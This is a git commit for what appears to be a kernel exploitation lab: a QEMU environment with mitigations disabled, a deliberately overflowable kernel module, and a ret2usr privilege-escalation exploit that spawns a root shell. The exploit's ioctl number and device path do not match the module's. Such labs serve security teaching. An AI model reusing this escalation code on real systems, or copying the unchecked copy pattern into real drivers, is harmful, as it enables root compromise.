Skip to content

Commit dbae17d

Browse files
committed
initial commit
0 parents  commit dbae17d

File tree

9 files changed

+193
-0
lines changed

9 files changed

+193
-0
lines changed

environment/Dockerfile

Lines changed: 2 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,2 @@
1+
FROM ubuntu:22.04
2+
RUN apt update && apt install -y zstd cpio python3 git fakeroot build-essential ncurses-dev xz-utils libssl-dev bc flex libelf-dev bison

environment/initramfs.cpio.gz

2.4 MB
Binary file not shown.

environment/start.sh

Lines changed: 9 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,9 @@
1+
qemu-system-x86_64 -kernel vmlinuz-5.13.19 \
2+
-nographic \
3+
-initrd initramfs.cpio.gz \
4+
-m 512 \
5+
-cpu kvm64 \
6+
-s \
7+
-append "console=ttyS0 nokaslr nopti nosmep nosmap quiet panic=1"
8+
9+
# freeze cpu on startup -S \

environment/vmlinuz-5.13.19

8.42 MB
Binary file not shown.

exploits/vuln1/Makefile

Lines changed: 10 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,10 @@
1+
##
2+
# Project Title
3+
#
4+
# @file
5+
# @version 0.1
6+
7+
default:
8+
gcc vuln1_exploit.c -static -o vuln1_exploit
9+
10+
# end

exploits/vuln1/vuln1_exploit.c

Lines changed: 89 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,89 @@
1+
#include "stdlib.h"
2+
#include "stdio.h"
3+
#include "string.h"
4+
#include <fcntl.h>
5+
#include <unistd.h>
6+
#include <sys/ioctl.h>
7+
8+
#define IOCTL_VULN1_WRITE 4141
9+
#define COMMIT_CREDS_ADDRESS 0xffffffff810d26f0ul
10+
#define PREPARE_KERNEL_CRED_ADDRESS 0xffffffff810d2950ul
11+
12+
typedef int (* t_commit_creds)(void *);
13+
typedef void *(* t_prepare_kernel_cred)(void *);
14+
15+
t_commit_creds commit_creds = (t_commit_creds)COMMIT_CREDS_ADDRESS;
16+
t_prepare_kernel_cred prepare_kernel_cred = (t_prepare_kernel_cred)PREPARE_KERNEL_CRED_ADDRESS;
17+
18+
unsigned long u_cs;
19+
unsigned long u_ss;
20+
unsigned long u_rsp;
21+
unsigned long u_rflags;
22+
unsigned long u_rip;
23+
24+
void start_sh() {
25+
char *args[] = {"/bin/sh", "-i", NULL};
26+
execve("/bin/sh", args, NULL);
27+
}
28+
29+
void save_state() {
30+
__asm__(
31+
".intel_syntax noprefix;"
32+
"mov u_cs, cs;"
33+
"mov u_ss, ss;"
34+
"mov u_rsp, rsp;"
35+
"pushf;"
36+
"pop u_rflags;"
37+
".att_syntax;"
38+
);
39+
u_rip = (unsigned long)&start_sh;
40+
}
41+
42+
void restore_state() {
43+
__asm__(
44+
".intel_syntax noprefix;"
45+
"swapgs;""push u_ss;" // restore gs reg and push all
46+
"push u_rsp;" // other values to the stack
47+
"push u_rflags;"
48+
"push u_cs;"
49+
"push u_rip;" // points to start_sh
50+
"iretq;"
51+
".att_syntax;"
52+
);
53+
}
54+
55+
56+
void exploit(){
57+
58+
commit_creds(prepare_kernel_cred(NULL));
59+
60+
restore_state();
61+
62+
}
63+
64+
void ioctl_write(int fd){
65+
66+
char buffer[512];
67+
memset(buffer, 0x41, sizeof(buffer));
68+
69+
// overwrite return address
70+
*(unsigned long *)&buffer[0x108] = (unsigned long) &exploit;
71+
72+
//save user state
73+
save_state();
74+
ioctl(fd, IOCTL_VULN1_WRITE, &buffer);
75+
}
76+
77+
void main()
78+
{
79+
int fd;
80+
81+
fd = open("/dev/vuln1", 0);
82+
if (fd < 0) {
83+
printf ("Cannot open device file");
84+
exit(-1);
85+
}
86+
87+
ioctl_write(fd);
88+
close(fd);
89+
}

modules/vuln1/Makefile

Lines changed: 19 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,19 @@
1+
obj-m := vuln1.o
2+
KDIR := /lib/modules/$(shell uname -r)/build
3+
PWD := $(shell pwd)
4+
5+
# Don't create .text.unlikely/.text.hot sections.
6+
EXTRA_CFLAGS += -fno-reorder-functions
7+
8+
# Disable stack protector to allow exploiting stack buffer overflows.
9+
EXTRA_CFLAGS += -fno-stack-protector
10+
11+
EXTRA_CFLAGS += -g -DDEBUG
12+
ccflags-y += ${EXTRA_CFLAGS}
13+
CC += ${EXTRA_CFLAGS}
14+
15+
default:
16+
$(MAKE) -C $(KDIR) M=$(PWD) SUBDIRS=$(PWD) modules
17+
18+
clean:
19+
$(MAKE) -C $(KDIR) M=$(PWD) SUBDIRS=$(PWD) clean

modules/vuln1/vuln1.c

Lines changed: 64 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,64 @@
1+
#include <linux/compiler.h>
2+
#include <linux/fs.h>
3+
#include <linux/kernel.h>
4+
#include <linux/miscdevice.h>
5+
#include <linux/module.h>
6+
#include <linux/uaccess.h>
7+
8+
9+
MODULE_DESCRIPTION("vuln1 buffer overflow");
10+
MODULE_AUTHOR("sashs");
11+
MODULE_LICENSE("GPL");
12+
13+
#define IOCTL_VULN_WRT 1337
14+
15+
static int vuln1_open(struct inode *inode, struct file *file)
16+
{
17+
return 0;
18+
}
19+
20+
static int vuln1_release(struct inode *inodep, struct file *filp)
21+
{
22+
return 0;
23+
}
24+
25+
static noinline int vuln1_do_breakstuff(unsigned long addr)
26+
{
27+
char buffer[256];
28+
volatile int size = 512;
29+
30+
return _copy_from_user(&buffer, (void __user *)addr, size);
31+
}
32+
33+
static long vuln1_ioctl(struct file *fd, unsigned int cmd, unsigned long value)
34+
{
35+
long to_return;
36+
37+
switch (cmd) {
38+
case IOCTL_VULN_WRT:
39+
to_return = vuln1_do_breakstuff(value);
40+
break;
41+
default:
42+
to_return = -EINVAL;
43+
break;
44+
}
45+
46+
return to_return;
47+
}
48+
49+
static const struct file_operations vuln1_fops = {
50+
.owner = THIS_MODULE,
51+
.open = vuln1_open,
52+
.unlocked_ioctl = vuln1_ioctl,
53+
.release = vuln1_release,
54+
.llseek = no_llseek,
55+
};
56+
57+
struct miscdevice vuln1_device = {
58+
.minor = MISC_DYNAMIC_MINOR,
59+
.name = "vuln",
60+
.mode = S_IRUGO | S_IWUGO,
61+
.fops = &vuln1_fops,
62+
};
63+
64+
module_misc_device(vuln1_device);

modules/vuln1/vuln1.ko

197 KB
Binary file not shown.

0 commit comments

Comments
 (0)